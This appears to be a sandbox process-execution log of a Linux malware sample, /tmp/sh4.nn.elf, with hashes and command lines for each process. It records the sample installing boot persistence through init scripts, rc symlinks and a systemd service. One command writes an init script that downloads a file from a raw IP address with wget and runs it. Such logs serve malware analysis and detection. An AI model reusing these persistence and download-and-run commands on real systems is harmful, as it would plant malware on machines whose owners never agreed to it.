                                                                                                    Start time (UTC):05:27:48
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:-
                                                                                                    File size:129816 bytes
                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                    Start time (UTC):05:27:48
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/usr/bin/systemctl
                                                                                                    Arguments:systemctl enable custom.service
                                                                                                    File size:996584 bytes
                                                                                                    MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                    Start time (UTC):05:27:48
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/tmp/sh4.nn.elf
                                                                                                    Arguments:-
                                                                                                    File size:4139976 bytes
                                                                                                    MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                                                                                                    Start time (UTC):05:27:48
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
                                                                                                    File size:129816 bytes
                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                    Start time (UTC):05:27:48
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:-
                                                                                                    File size:129816 bytes
                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                    Start time (UTC):05:27:48
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/usr/bin/chmod
                                                                                                    Arguments:chmod +x /etc/init.d/system
                                                                                                    File size:63864 bytes
                                                                                                    MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                                                    Start time (UTC):05:27:49
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/tmp/sh4.nn.elf
                                                                                                    Arguments:-
                                                                                                    File size:4139976 bytes
                                                                                                    MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                                                                                                    Start time (UTC):05:27:49
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
                                                                                                    File size:129816 bytes
                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                    Start time (UTC):05:27:49
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:-
                                                                                                    File size:129816 bytes
                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                    Start time (UTC):05:27:49
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/usr/bin/ln
                                                                                                    Arguments:ln -s /etc/init.d/system /etc/rcS.d/S99system
                                                                                                    File size:76160 bytes
                                                                                                    MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                                                                                    Start time (UTC):05:27:49
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/tmp/sh4.nn.elf
                                                                                                    Arguments:-
                                                                                                    File size:4139976 bytes
                                                                                                    MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                                                                                                    Start time (UTC):05:27:49
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh4.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh4.nn.elf'\n /tmp/sh4.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh4.nn.elf'\n killall sh4.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh4.nn.elf"
                                                                                                    File size:129816 bytes
                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                    Start time (UTC):05:27:49
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/tmp/sh4.nn.elf
                                                                                                    Arguments:-
                                                                                                    File size:4139976 bytes
                                                                                                    MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                                                                                                    Start time (UTC):05:27:49
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:sh -c "chmod +x /etc/init.d/sh4.nn.elf >/dev/null 2>&1"
                                                                                                    File size:129816 bytes
                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                    Start time (UTC):05:27:49
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:-
                                                                                                    File size:129816 bytes
                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                    Start time (UTC):05:27:49
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/usr/bin/chmod
                                                                                                    Arguments:chmod +x /etc/init.d/sh4.nn.elf
                                                                                                    File size:63864 bytes
                                                                                                    MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                                                    Start time (UTC):05:27:49
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/tmp/sh4.nn.elf
                                                                                                    Arguments:-
                                                                                                    File size:4139976 bytes
                                                                                                    MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                                                                                                    Start time (UTC):05:27:49
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
                                                                                                    File size:129816 bytes
                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                    Start time (UTC):05:27:49
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:-
                                                                                                    File size:129816 bytes
                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                    Start time (UTC):05:27:49
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/usr/bin/mkdir
                                                                                                    Arguments:mkdir -p /etc/rc.d
                                                                                                    File size:88408 bytes
                                                                                                    MD5 hash:088c9d1df5a28ed16c726eca15964cb7

                                                                                                    Start time (UTC):05:27:49
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/tmp/sh4.nn.elf
                                                                                                    Arguments:-
                                                                                                    File size:4139976 bytes
                                                                                                    MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                                                                                                    Start time (UTC):05:27:49
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:sh -c "ln -s /etc/init.d/sh4.nn.elf /etc/rc.d/S99sh4.nn.elf >/dev/null 2>&1"
                                                                                                    File size:129816 bytes
                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                    Start time (UTC):05:27:49
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:-
                                                                                                    File size:129816 bytes
                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                    Start time (UTC):05:27:49
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/usr/bin/ln
                                                                                                    Arguments:ln -s /etc/init.d/sh4.nn.elf /etc/rc.d/S99sh4.nn.elf
                                                                                                    File size:76160 bytes
                                                                                                    MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                                                                                    Start time (UTC):05:27:49
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/tmp/sh4.nn.elf
                                                                                                    Arguments:-
                                                                                                    File size:4139976 bytes
                                                                                                    MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                                                                                                    Start time (UTC):05:27:49
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/tmp/sh4.nn.elf
                                                                                                    Arguments:-
                                                                                                    File size:4139976 bytes
                                                                                                    MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                                                                                                    Start time (UTC):05:27:48
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/usr/lib/udisks2/udisksd
                                                                                                    Arguments:-
                                                                                                    File size:483056 bytes
                                                                                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                                                    Start time (UTC):05:27:48
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/usr/sbin/dumpe2fs
                                                                                                    Arguments:dumpe2fs -h /dev/dm-0
                                                                                                    File size:31112 bytes
                                                                                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                                                                    Start time (UTC):05:27:48
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/usr/lib/systemd/systemd
                                                                                                    Arguments:-
                                                                                                    File size:1620224 bytes
                                                                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                                    Start time (UTC):05:27:48
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                    Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                    File size:22760 bytes
                                                                                                    MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                                                    Start time (UTC):05:27:49
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/usr/lib/udisks2/udisksd
                                                                                                    Arguments:-
                                                                                                    File size:483056 bytes
                                                                                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                                                    Start time (UTC):05:27:49
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/usr/sbin/dumpe2fs
                                                                                                    Arguments:dumpe2fs -h /dev/dm-0
                                                                                                    File size:31112 bytes
                                                                                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                                                                    Start time (UTC):05:27:49
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/usr/lib/udisks2/udisksd
                                                                                                    Arguments:-
                                                                                                    File size:483056 bytes
                                                                                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                                                    Start time (UTC):05:27:50
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/usr/sbin/dumpe2fs
                                                                                                    Arguments:dumpe2fs -h /dev/dm-0
                                                                                                    File size:31112 bytes
                                                                                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4